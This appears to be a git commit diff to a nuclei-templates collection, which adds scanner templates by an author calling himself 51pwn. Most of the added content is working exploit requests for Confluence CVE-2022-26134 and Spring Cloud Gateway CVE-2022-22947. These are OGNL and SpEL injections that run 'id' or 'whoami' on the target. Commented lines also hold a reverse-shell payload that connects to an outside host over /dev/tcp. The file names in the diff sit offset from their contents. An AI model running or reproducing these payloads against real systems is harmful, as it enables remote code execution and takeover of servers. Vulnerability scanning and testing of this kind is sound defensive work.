fix nuclei-templeates 2022-07-06 13:51:1657086717

Author: x51pwn

config/nuclei-templates/.checksum

@@ -25,5 +25,5 @@ jobs:
       - name: Template Validation
         run: |
           cp -r ${{ github.workspace }} $HOME
-          nuclei -validate -t .
+          nuclei -validate -t . -et .git/
           nuclei -validate -w ./workflows

config/nuclei-templates/.github/workflows/template-validate.yml

@@ -0,0 +1,5 @@
+.idea/
+.DS_Store
+local/
+.checksum
+.new-additions

config/nuclei-templates/.gitignore

@@ -1,57 +1,28 @@
-cves/2018/CVE-2018-14918.yaml
-cves/2019/CVE-2019-18665.yaml
-cves/2019/CVE-2019-20210.yaml
-cves/2021/CVE-2021-25085.yaml
-cves/2021/CVE-2021-27309.yaml
-cves/2022/CVE-2022-29299.yaml
-cves/2022/CVE-2022-29301.yaml
-exposed-panels/fuji-xerox-printer-detect.yaml
-exposed-panels/geoserver-login-panel.yaml
-exposed-panels/ibm/ibm-maximo-login.yaml
-exposed-panels/ibm/ibm-websphere-admin-panel.yaml
-exposed-panels/ictprotege-login-panel.yaml
-exposed-panels/magento-downloader-panel.yaml
-exposed-panels/officekeeper-admin-login.yaml
-exposed-panels/qnap/qnap-photostation-panel.yaml
-exposed-panels/qnap/qnap-qts-panel.yaml
-exposed-panels/synopsys-coverity-panel.yaml
-exposures/configs/editor-exposure.yaml
-exposures/files/vagrantfile-exposure.yaml
-headless/screenshot.yaml
-technologies/hashicorp-boundary-detect.yaml
-token-spray/api-1forge.yaml
-token-spray/api-airtable.yaml
-token-spray/api-amdoren.yaml
-token-spray/api-api2convert.yaml
-token-spray/api-apiflash.yaml
-token-spray/api-blitapp.yaml
-token-spray/api-browshot.yaml
-token-spray/api-currencyfreaks.yaml
-token-spray/api-currencylayer.yaml
-token-spray/api-currencyscoop.yaml
-token-spray/api-exchangerateapi.yaml
-token-spray/api-gorest.yaml
-token-spray/api-host-io.yaml
-token-spray/api-hunter.yaml
-token-spray/api-ip2whois.yaml
-token-spray/api-ipfind.yaml
-token-spray/api-jsonbin.yaml
-token-spray/api-lob.yaml
-token-spray/api-mac-address-lookup.yaml
-token-spray/api-open-page-rank.yaml
-token-spray/api-opengraphr.yaml
-token-spray/api-pagecdn.yaml
-token-spray/api-proxycrawl.yaml
-token-spray/api-proxykingdom.yaml
-token-spray/api-savepage.yaml
-token-spray/api-scraperapi.yaml
-token-spray/api-scraperbox.yaml
-token-spray/api-scrapestack.yaml
-token-spray/api-scrapingant.yaml
-token-spray/api-scrapingdog.yaml
-token-spray/api-screenshotapi.yaml
-token-spray/api-serpstack.yaml
-token-spray/api-supportivekoala.yaml
-token-spray/api-wordnik.yaml
-token-spray/api-zenrows.yaml
-vulnerabilities/other/finecms-sqli.yaml
+cves/2022/CVE-2022-24129.yaml
+cves/2022/CVE-2022-26960.yaml
+cves/2022/CVE-2022-33174.yaml
+exposed-panels/audiocodes-detect.yaml
+exposed-panels/docebo-elearning-panel.yaml
+exposed-panels/highmail-admin-panel.yaml
+exposed-panels/horde-login-panel.yaml
+exposed-panels/horde-webmail-login.yaml
+exposed-panels/powerjob-panel.yaml
+exposed-panels/qmail-admin-login.yaml
+exposed-panels/sqwebmail-login-panel.yaml
+exposed-panels/telerik-server-login.yaml
+exposed-panels/webshell4-login-panel.yaml
+exposures/configs/parameters-config.yaml
+exposures/files/cloud-config.yaml
+exposures/files/docker-cloud.yaml
+exposures/files/redmine-config.yaml
+exposures/files/redmine-settings.yaml
+exposures/files/ruby-rail-storage.yaml
+exposures/files/secrets-file.yaml
+exposures/files/symfony-security.yaml
+misconfiguration/confluence/confluence-oauth-admin.yaml
+network/openssh-detection.yaml
+technologies/cloudfoundry-detect.yaml
+technologies/matrix-detect.yaml
+technologies/openresty-detect.yaml
+vulnerabilities/other/elFinder-path-traversal.yaml
+vulnerabilities/wordpress/wp-insert-php-xss.yaml

config/nuclei-templates/.new-additions

@@ -0,0 +1,23 @@
+# ==| Nuclei Templates Ignore list |==
+# ====================================
+#
+# This is default list of tags and files to excluded from default nuclei scan.
+# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
+# 
+# ============ DO NOT EDIT ============
+# Automatically updated by nuclei on execution from nuclei-templates
+# User changes should be in nuclei config file
+# ============ DO NOT EDIT ============
+
+# tags is a list of tags to ignore execution for
+# unless asked for by the user.
+
+tags:
+  - "fuzz"
+  - "dos"
+
+# files is a list of files to ignore template execution
+# unless asked for by the user.
+
+# files:
+#  - cves/2020/CVE-2020-35489.yaml

config/nuclei-templates/.nuclei-ignore

@@ -0,0 +1,88 @@
+id: atlassian_confluence_CVE_2022_26134_RCE
+info:
+  name: atlassian_confluence_CVE_2022_26134_RCE
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: atlassian,confluence,CVE-2022-26134,web,RCE
+
+variables:
+  # for check
+  # .(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
+  # SetHd: ".%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
+  # SetPld: "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29"
+  # id
+  # %28java.net.InetAddress.getByName%28%22{{interactsh-url}}%2229%29%.
+  # CheckPayload: "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%23a%29%29%7D/"
+  CheckPayload1: "%24%7B%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%22{{randstr}}%22%29%7D/"
+  # CheckPayload1: "%24%7B%28java.net.InetAddress.getByName%28%22{{interactsh-url}}%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%2251pwn%22%29%29%7D/"
+  # for reverse
+  # RvsHst: "51pwn.com"
+  # RvsHstPort: "9999"
+  # RvsPayload: "/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/{{RvsHst}}/{{RvsHstPort}}%200%3E%261%27%29.start%28%29%22%29%7D/"
+  # GET {{mypaths}}/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/docker.for.mac.localhost/9999%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1
+#   # 107.182.191.202
+requests:
+  - raw:
+      # - |+
+      #   GET {{mypaths}}/{{RvsPayload}} HTTP/1.1
+      #   Host: {{Hostname}}
+      #   User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+      #   Accept:*/*
+      #   Pragma:no-cache
+      #   Accept-Encoding:gzip, deflate
+      #   Connection: close
+      #   Content-Length: 0
+        
+      - |+
+        GET {{mypaths}}/{{CheckPayload1}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Accept:*/*
+        Pragma:no-cache
+        Accept-Encoding:gzip, deflate
+        Connection: close
+        Content-Length: 0
+        
+      # end payload
+    payloads:
+      mypaths:
+        - "/bootstrap"
+        - ""
+    attack: pitchfork 
+    unsafe: true
+    # pipeline: true
+    # pipeline-concurrent-connections: 40
+    # pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    stop-at-first-match: true
+    # matchers-condition: or
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(uid=[^\n\r\\]+)'
+      - type: word
+        part: header
+        words: 
+          - "Host: {{randstr}}"
+      # - type: word
+      #   part: interactsh_protocol
+      #   words:
+      #     - "dns"
+        condition: or
+    extractors:
+      - type: regex
+        part: header
+        name: uid
+        regex:
+          - '(uid=[^\n\r\\]+)'
+          # - '(X-Confluence-Request-Time)'
+      - type: regex
+        part: header
+        name: host
+        regex:
+          - '({{randstr}})'

config/nuclei-templates/51pwn/51pwn/51pwn/Confluence_CVE-2022-26134.yaml

@@ -0,0 +1,26 @@
+id: go-swagger-api-leak
+
+info:
+  name: go swagger api leak
+  description: doNuclei http://127.0.0.1:8080 goSwaggerAPI.yaml
+  author: 51pwn
+  severity: medium
+  tags: web,api,leak
+
+requests:
+  - raw:
+      - |+
+        GET /swagger/doc.json HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+    
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"application/json"'
+          - '"post"'
+          - '"parameters"'
+          - 'responses'
+        condition: and

config/nuclei-templates/51pwn/51pwn/51pwn/goSwaggerAPI.yaml

@@ -0,0 +1,90 @@
+id: spring_cloud_gateway_CVE_2022_22947
+
+info:
+  name: spring_cloud_gateway_CVE_2022_22947
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: spring,CVE-2022-22947,RCE,web,gateway,actuator
+
+requests:
+  - raw:
+      - |+
+        POST /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        Content-Type: application/json
+        Connection: keep-alive
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Content-Length: 333
+
+        {
+          "id": "hacktest",
+          "filters": [{
+            "name": "AddResponseHeader",
+            "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+            }],
+          "uri": "https://51pwn.com",
+          "order": 0
+        }
+      - |+
+        POST /actuator/gateway/refresh HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Connection: keep-alive
+        Pragma:no-cache
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 0
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+      - |+
+        GET /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Connection: keep-alive
+        Pragma:no-cache
+        Content-Length: 0
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+      - |+
+        DELETE /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Connection: keep-alive
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+      - |+
+        POST /actuator/gateway/refresh HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Connection: close
+        Pragma:no-cache
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 0
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+       
+        
+       
+        
+      # end payload
+    unsafe: true
+    pipeline: true
+    pipeline-concurrent-connections: 40
+    pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    # matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - '(uid=[^\n\\]+)'
+    extractors:
+      - type: regex
+        part: body
+        name: xxxx
+        regex:
+          - '(uid=[^\n\\]+)'

config/nuclei-templates/51pwn/51pwn/51pwn/spring_cloud_gateway_CVE_2022_22947.yaml

@@ -15,7 +15,6 @@ requests:
         GET /bea_wls_internal/classes/mejb@/org/omg/stub/javax/management/j2ee/_ManagementHome_Stub.class HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
-
     redirects: true
     max-redirects: 5
 
@@ -39,4 +38,3 @@ requests:
         part: body
         binary:
           - "fecabeba"
-